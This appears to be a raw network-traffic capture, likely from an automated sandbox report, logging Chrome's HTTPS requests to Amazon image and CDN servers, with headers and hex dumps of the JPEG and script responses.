                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 97 3b fb e5 e4 e5 f5 eb da 35 e1 ba 03 07 d2 bf b9 f8 92 4b ff fa d1 87 ff cd 6f 8d fc 3f 1a 34 c3 90 9c 37 2c ba 11 db 49 52 98 75 08 a4 24 22 a1 2b 34 b0 6a 08 21 f8 6e 9b a4 e5 d3 b2 ed d0 fd 3e f6 6d 5e c6 8e a5 ab 19 77 e6 85 c4 74 ef de b2 f3 74 9d 6e c9 3d 18 35 7c 04 d1 61 a1 ec 7f f0 09 ca 3e f9 1a bc 7e b4 a1 7d e9 fd ea f3 fc e3 9f ff e4 91 47 1e 41 53 9a 5f 0d 92 ba 76 3d 67 f8 f0 e1 1f 4c 9f 31 c3 da b5 4b 97 5a e6 96 aa aa 44 45 46 10 15 19 21 7a f7 4a b1 2d 5f b1 e2 7a 69 c8 be 97 5d 7e c5 29 1f bc ff 5e 8b 94 e1 da eb ae 3b 71 e4 88 11 9f 4d 9f 31 23 a8 5b 52 52 3d f9 91 11 66 22 23 c2 e9 9d d2 d3 b2 72 d5 ea cb 81 be 57 5e 75 f5 cc 77 df 79 bb b8 25 f2 af bc ea aa c9 a3 47 8d fa fa 84 e9 d3 c3 7b 26 27 d7 33 17 c3 c3 c3 08 0f 0f a3 57 cf
                                                                                                                                                                                                                                                                Data Ascii: ;5Ko?47,IRu$"+4j!n>m^wttn=5|a>~}GAS_v=gL1KZDEF!zJ-_zi]~)^;qM1#[RR=f"#rW^uwy%G{&'3W
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: ca 01 d4 8c c3 85 69 d4 0b a8 19 86 8e df 5f db 0d ad 1b 3a ba 3d ba d6 7b 35 fd ff 51 d2 54 3b a0 46 c0 2d d9 50 40 4d 0f 8b 85 3a 01 b5 2a f8 fd 3a 4a e5 29 57 5c 71 19 a7 9c 72 12 dd ba 75 ab 35 1e 5d d7 d1 34 8d bb ff ef 1e d2 d3 f6 63 d2 b4 7a e3 ad 42 70 90 a3 8b c9 dc b0 d9 d4 1c 04 60 36 69 4a 45 85 d3 06 14 35 74 4c 48 70 70 17 93 d9 52 eb 3d 3d 7d 7f bd e3 ec 0e 15 0c 1f d2 eb 82 4a 45 00 30 99 4c 42 1a 46 a3 1b 9d 90 e0 90 78 73 1d f9 4a c1 6e f4 06 1f 82 12 dd eb ae e5 0d 34 99 34 54 45 f9 ad 9e 7b bf 29 34 84 8a 7d f7 97 ed 93 22 14 a4 84 59 23 4b ea 7d a5 fb 77 2c e5 b9 b4 55 b5 de 33 fc 7e 8c f3 eb 9a 1f 12 21 03 f1 ed 1b 8b 27 d5 a3 58 3c fb ec b3 0d 5e da 7f e5 75 f5 e4 48 02 4f c8 e7 5f 78 a1 c5 c1 b1 2a cc 5f 30 bf fa 6f af d7 5b 6b f5
                                                                                                                                                                                                                                                                Data Ascii: i_:={5QT;F-P@M:*:J)W\qru5]4czBp`6iJE5tLHppR==}JE0LBFxsJn44TE{)4}"Y#K}w,U3~!'X<^uHO_x*_0o[k
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: bb d3 96 2d 5f 76 a5 aa 2a ef 9f 30 7d 7a 78 72 8f 1e 8d 32 7b 75 5d 67 cd da 75 2c 5d b2 78 db d2 25 4b af 28 29 2c 6c d0 db f5 67 80 86 94 c4 c4 c7 e2 d8 bd 9f 17 d6 17 72 42 cf 20 c2 2d 0a af 2c 2b e4 fa 91 d1 24 1e d8 0e 9a e0 d2 d1 49 04 d9 cd 3c bf 68 0f 08 41 61 b1 93 6c d7 91 a7 a5 04 c6 07 83 34 b7 2d b8 26 cc 3a 07 00 69 18 44 1c 3f ad 7d 77 b5 6c 79 bd e7 56 41 5e 04 fe fd 41 14 e7 4b f6 c5 cf 60 c7 96 1f 19 38 ac f5 b4 91 dc 9c 1c ff a2 45 8b e6 b8 dd ee a2 c2 a2 a2 c7 fb f4 ee d3 7b f0 90 c1 6a 54 64 24 56 ab 05 5d 37 28 2d 2b 27 2b 33 93 ad db b6 ba 0e a4 a7 7f 3a 77 ee bc fb b2 b2 32 b3 5a 7a 8d 37 5e 7f 7d ae fb f2 cb 67 94 94 94 fe bb 57 af 5e 43 86 0e 1d 5a c9 3e b5 60 48 83 d2 32 27 87 0f 65 b1 65 eb 36 d7 e1 c3 87 de da b8 69 f3 3d 73
                                                                                                                                                                                                                                                                Data Ascii: -_v*0}zxr2{u]gu,]x%K(),lgrB -,+$I<hAal4-&:iD?}wlyVA^AK`8E{jTd$V]7(-+'+3:w2Zz7^}gW^CZ>`H2'ee6i=s
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: f6 39 73 e6 38 26 4d 9a 74 83 61 18 67 69 aa 3a 48 4a e9 8f 88 88 70 bd ff fe fb 9f ff fc f3 cf af b8 5c ae 3d 97 5d 76 59 b3 ea 74 d2 49 a7 d8 af bb ee 86 58 8f b7 e2 62 69 e8 67 9d 7e fa e9 5d 0d c3 30 03 8a a8 24 36 09 21 dc 9a a6 79 76 ee dc b9 e3 f2 cb af f8 fc f2 cb af 5e f8 d3 4f df 1f fc ef 7f ff fc e5 56 8e 36 34 09 98 ca b3 11 6d ad 76 57 59 e5 4e 02 4a 79 3e 98 1b 97 23 cc a1 48 6f c3 55 47 94 1a 75 8d ea 72 8d 54 21 28 f3 83 10 0a 6a 73 d7 a8 e4 1a 09 20 4f 17 f8 6a 4e 41 1d 54 ad 10 4d f3 93 ad b7 c4 f8 6a 9a 48 b2 6a d5 aa ee c9 c9 c9 df 48 29 85 dd 6e 4f dc bb 77 ef cb bb 77 ef fe ec e4 93 4f 5e 5a 5c 5c dc e5 b4 d3 4e 5b 9e 9b 9b fb e8 db 6f bf fd e2 d5 57 5f dd a8 a0 eb 6f bd c5 36 a8 57 ef b3 47 8e 18 7c 6b 64 54 74 2f b3 d9 14 a2 aa 9a
                                                                                                                                                                                                                                                                Data Ascii: 9s8&Mtagi:HJp\=]vYtIXbig~]0$6!yv^OV64mvWYNJy>#HoUGurT!(js OjNATMjHjH)nOwwO^Z\\N[oW_o6WG|kdTt/
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 13 52 4a 19 1e 1e 1e 92 d2 a3 c7 98 e7 9e 7b ae bf d3 59 61 16 42 d8 01 84 10 ca 80 01 fd 2f 0d 0d 0d bd c8 6c 36 c7 68 9a 26 84 10 ea b0 61 c3 2f 89 88 88 f8 b6 53 11 5a 0f 4d 98 4c ec 9a 3e 89 d6 a6 1e 56 43 1a 28 53 4f 6c d4 b7 62 1f 3a 1d c5 62 a1 64 d3 06 dc 1b d7 13 7d c3 5f 69 b2 50 aa a2 50 7c ed 49 b5 bc 46 41 ff 7c 01 00 55 53 29 be fa c4 e6 bd 46 d7 ce 46 00 6b cb d4 7a 5e a3 40 fc 5c b0 a2 b4 f9 bc 89 e9 08 44 03 77 56 58 54 64 84 85 86 6a 17 5e 78 e1 dc d1 a3 47 3f ea ac 70 b9 97 2c 59 12 db a7 4f 9f e2 5d bb 76 c9 e4 e4 64 b3 61 18 62 f1 af 8b c7 5d 72 f1 45 77 d8 6c b6 41 c5 c5 c5 d5 4a d2 ad 5b 37 35 29 29 f1 64 9b cd 1a e1 f3 f9 7c 86 61 14 01 b6 e8 e8 c8 c1 8a a2 0a 00 21 84 18 38 70 e0 84 01 03 06 0c a4 d2 75 a5 69 5a 75 e9 8f b8 b8 d8
                                                                                                                                                                                                                                                                Data Ascii: RJ{YaB/l6h&a/SZML>VC(SOlb:bd}_iPP|IFA|US)FFkz^@\DwVXTdj^xG?p,YO]vdab]rEwlAJ[75))d|a!8puiZu
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: b7 aa 42 85 f0 51 21 5a fa db 1e 39 4e ad 28 44 18 0d 95 e1 91 28 3d 47 23 fd 5e e4 81 cd 8d 88 a9 5a 11 9a b6 32 ce 3f ff 7c 27 f0 ec e7 9f 7f fe d2 c9 a7 9c a2 69 9a 26 0a 0b 0b 1b 65 9f fe f8 e3 8f 72 ec d8 b1 db 54 55 2d 01 ba 9a cd 66 5b 72 72 f2 e8 a4 a4 a4 be aa aa 5a 4d 26 53 d5 13 49 d8 6c b6 01 7f ff fb df 4f 36 9b cd 6e af d7 e7 8e 8a 8a 1a a1 99 34 5b 60 58 42 19 3f 7e dc ad 52 8e 35 4c 26 53 88 aa 2a 02 90 f9 f9 f9 69 eb d7 af 6f da ee eb 44 3d fc e1 7a a8 39 10 8c 8a 4a e6 d7 dc dd a0 a8 68 08 fc ad 4d e2 a9 f0 93 32 77 11 de bc 3c d2 c7 27 77 c8 b8 ce 3d f7 5c 2f 2d 28 7e 95 91 91 21 9f 7a ea a9 7d 40 69 0d ee 50 89 cd 6a f5 01 56 29 0d 29 84 2a 02 13 7d fc c5 e3 c6 8d 3b b3 ea 5c 21 44 b8 d9 6c 52 21 50 5c 59 4a 89 10 c2 e5 72 b9 74 8b c5
                                                                                                                                                                                                                                                                Data Ascii: BQ!Z9N(D(=G#^Z2?|'i&erTU-f[rrZM&SIlO6n4[`XB?~R5L&S*ioD=z9JhM2w<'w=\/-(~!z}@iPjV))*};\!DlR!P\YJrt


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                45192.168.2.449881151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC696OUTGET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3939
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 4716c533-09ec-4263-944f-69c7c0012d21
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 01 Apr 2044 20:00:54 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1802902
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:26 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200120-IAD, cache-nyc-kteb1890034-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9a 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 06 07 01 05 03 04 08 02 10 00 02 01 03 03 01 06 04 04 02 09 05 00 00 00 00 01 02 03 00 04 11 05 12 21 31 06 13 22 41 51 71 07 61 81 91 14 32 72 b1 42 d1 25 33 52 62 82 92 a1 a2 b2
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQqa2rB%3Rb
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 2a 00 cb fb 01 fc 5f a7 a9 ae 59 1a 75 79 11 da 5d a5 ec ce b8 da 95 98 d2 de 3d e3 ee 8a 12 4b d8 ee 80 ef c3 86 00 78 95 b7 2f 1c 67 63 71 9f 63 cd 71 84 b6 8b c7 de b3 fa 2a a9 8d 8f bb 1e 00 ae 09 a5 b7 ba 58 ae ed 14 ac 33 86 2a 87 ac 6c a7 6b a7 b0 3c a9 f3 04 7a 1a 93 69 9d 99 86 ee cb f1 d2 dc 94 40 1c b0 11 16 db b3 af 98 27 15 9b f2 57 ca f9 d3 b2 73 8f 76 69 bc ed 11 a2 17 6e d5 72 ec 46 e5 bb 69 17 bb 00 22 7f 61 78 07 dc f5 63 ef 5d 5a d9 6a 16 76 f6 db 0d bd d2 ce 1b c8 21 46 5f 7c d6 b6 95 b2 13 8c dc 67 c8 dd 52 84 a0 9c 16 cb f9 5f ef 71 4a 52 b9 9d 05 29 4a 00 52 94 a0 08 5d 66 be 6b 22 b4 83 46 69 4a 54 00 a5 2b 31 a9 97 3b 01 6c 7a 0d df b6 6a 36 06 d2 e4 ec 46 31 1c 8d ec 3e f8 ae 45 97 6e 07 21 54 1d d8 25 77 01 d5 7f c6 df bd 62 1b
                                                                                                                                                                                                                                                                Data Ascii: *_Yuy]=Kx/gcqcq*X3*lk<zi@'WsvinrFi"axc]Zjv!F_|gR_qJR)JR]fk"FiJT+1;lzj6F1>En!T%wb
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1183INData Raw: 91 7f e2 d5 5d 55 3e a6 9f 9d b7 7f d9 97 7a 5b 5e 46 ad bf 74 29 4a 52 03 e2 94 a5 00 29 4a 50 04 2a 94 a5 69 46 85 29 4a 00 c3 ae f5 65 f5 06 bd 63 a3 6a 63 58 d3 2d 2e 87 25 e2 5d df 27 5f 0b fd 98 57 94 6a ea ec 17 e3 f4 dd 31 6e 20 8b f1 31 5c c9 21 ee 04 8b 1b c7 b0 f7 79 4d d8 56 df 8e 41 65 a6 31 a6 d4 da 28 b5 ec 78 4b 1e 16 bf 52 7d 2b f9 36 5a ec 7f 98 7a 86 fd ab c4 ff 00 08 13 3a fd 8f f7 22 b8 3f 64 22 bd b1 a8 6a c9 27 8a 5b 4b a8 bd 41 b6 69 3f d6 3e f0 55 1d d8 be c0 45 d9 dd 4f f1 c6 e6 49 b0 92 81 12 e9 b7 31 b0 ef 3e 65 48 e2 9e 32 87 a6 b4 18 fc 2b 51 9e dc de 2c b7 4b 02 1c f7 4b 83 ef d4 fd ab 98 76 92 78 a2 d9 63 61 72 ec 7f 8c c3 dc e3 db bc 31 81 ef 87 f6 ad 65 b5 85 fc e9 27 e2 6c 86 4b 78 41 60 02 e4 65 88 93 7a c8 79 e3 2c ab
                                                                                                                                                                                                                                                                Data Ascii: ]U>z[^Ft)JR)JP*iF)JecjcX-.%]'_Wj1n 1\!yMVAe1(xKR}+6Zz:"?d"j'[KAi?>UEOI1>eH2+Q,KKvxcar1e'lKxA`ezy,


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                46192.168.2.449883151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC699OUTGET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3980
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: b7e8c38c-8245-4c81-bdd9-86309d5e8ac8
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 03 Mar 2044 20:10:39 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1662393
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000052-IAD, cache-ewr18124-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9e 00 01 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 01 05 06 02 04 07 03 10 00 02 01 03 03 02 04 04 04 04 02 0b 00 00 00 00 01 02 11 00 03 04 12 21 31 05 41 06 13 22 51 32 61 71 a1 14 81 91 b1 15 23 42 72 b2 e1 07 25 33 43 53 73 82
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Q2aq#Br%3CSs
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 3d 7a 44 45 03 06 7d cd f8 4a 73 6c 01 bb 5c 9f 65 bf b5 f8 0f 16 e3 be 1d b4 64 0a 49 46 2c 1d ed 18 f4 90 65 bb 82 08 24 fb 77 15 e1 d7 6d 3d 87 7b 4e 21 91 98 1f aa 98 35 e8 1d 33 a9 e6 e2 de 47 54 f2 a5 87 ab ca 2a 3f 22 66 b2 99 36 9f 3b 3f 20 3b 7a 9e e1 25 a3 92 c4 4e c0 40 e6 a8 31 cc 14 b3 a5 23 39 27 a6 ba dc ad 9a 04 e6 78 5d 7d 2d 1d 55 51 51 5c 9d 74 b3 2f b1 23 f4 31 51 cd 73 05 b6 36 2b b6 bd c5 c2 52 a2 a6 b0 84 a9 a8 a5 2d 90 b9 52 a2 a6 97 4a 16 8e 94 a5 61 46 4a 52 94 21 29 5f 4b 76 9e e9 d2 82 4f ed f5 3c 0a fa dc c3 bb 6f 54 af c3 13 04 12 bf 51 4c 18 e2 2e 06 c9 4c 8d 1b 13 ba e9 66 0c 1b 56 d3 26 e9 0c e3 25 16 fa 07 69 b7 64 6b 2c e0 2f 0d a5 55 77 da 20 90 35 86 ae 58 dd 37 cb bc 89 6f 21 6e be 3b dd 17 e0 c5 b7 47 46 36 5e c3 05
                                                                                                                                                                                                                                                                Data Ascii: =zDE}Jsl\edIF,e$wm={N!53GT*?"f6;? ;z%N@1#9'x]}-UQQ\t/#1Qs6+R-RJaFJR!)_KvO<oTQL.LfV&%idk,/Uw 5X7o!n;GF6^
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1224INData Raw: 3c 0f d5 13 a7 df cc bf 7c b3 2a 06 d2 80 c9 72 f7 23 45 b0 78 00 fa 9a 3e 64 8a a2 c3 1a 44 d2 02 ba 3c 5d c0 d3 c4 47 0a 87 5e b3 71 a6 66 e5 ed fd fd 6d bf 02 b9 2a 33 c8 50 4c 7b 09 af 9f 4e b8 3a 87 96 db 81 7e e3 99 20 02 03 39 89 00 01 aa 39 e3 7a bd fc 63 b3 15 b5 b2 2c 84 b5 6c 12 cd 1b 02 4c 6c 0f 25 a7 ff 00 66 ab 66 8e f3 48 7f 12 ac 21 9c b6 08 80 f4 05 53 03 35 15 69 d4 6d 85 5b 0c 48 2f a6 1e 3b 95 00 cf df 9e e2 0d 55 d6 87 32 c6 ca 43 1f ad a1 ca 69 51 4a 54 cb 4d 4a 52 b5 28 c9 4a 52 84 25 00 a5 48 a1 0a ab 2d d7 c9 4c 86 ff 00 76 f9 4a 4f b7 c6 07 dc 0a cc db c6 19 9d 6b a6 33 4c 79 cc df 4d 0e 2f fd 82 cd 77 70 ba dd 8c 77 ce c4 cd 91 6d ef 5c 21 a0 b0 59 30 55 80 96 83 12 08 98 fd 0d 5b 60 36 05 cc 8b 57 ac 65 21 f2 85 c2 c0 b0 1a 43
                                                                                                                                                                                                                                                                Data Ascii: <|*r#Ex>dD<]G^qfm*3PL{N:~ 99zc,lLl%ffH!S5im[H/;U2CiQJTMJR(JR%H-LvJOk3LyM/wpwm\!Y0U[`6We!C


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                47192.168.2.449886151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC421OUTGET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 23
                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 0205a7df-c99a-46fe-827d-288fa624acf5
                                                                                                                                                                                                                                                                Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 28 Nov 2016 08:22:04 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Sat, 06 Apr 2024 04:36:34 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 17405
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200178-IAD, cache-ewr18182-EWR
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC23INData Raw: 77 69 6e 64 6f 77 2e 75 65 5f 61 64 62 5f 63 68 6b 20 3d 20 31 3b 0a
                                                                                                                                                                                                                                                                Data Ascii: window.ue_adb_chk = 1;


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                48192.168.2.44988518.239.24.1884437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC661OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Referer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                                                Content-Length: 31002
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 6dacb469-d1a7-4273-ad3c-a3e25de9c412
                                                                                                                                                                                                                                                                Date: Thu, 08 Aug 2024 13:23:38 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 08 Aug 2024 13:22:33 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
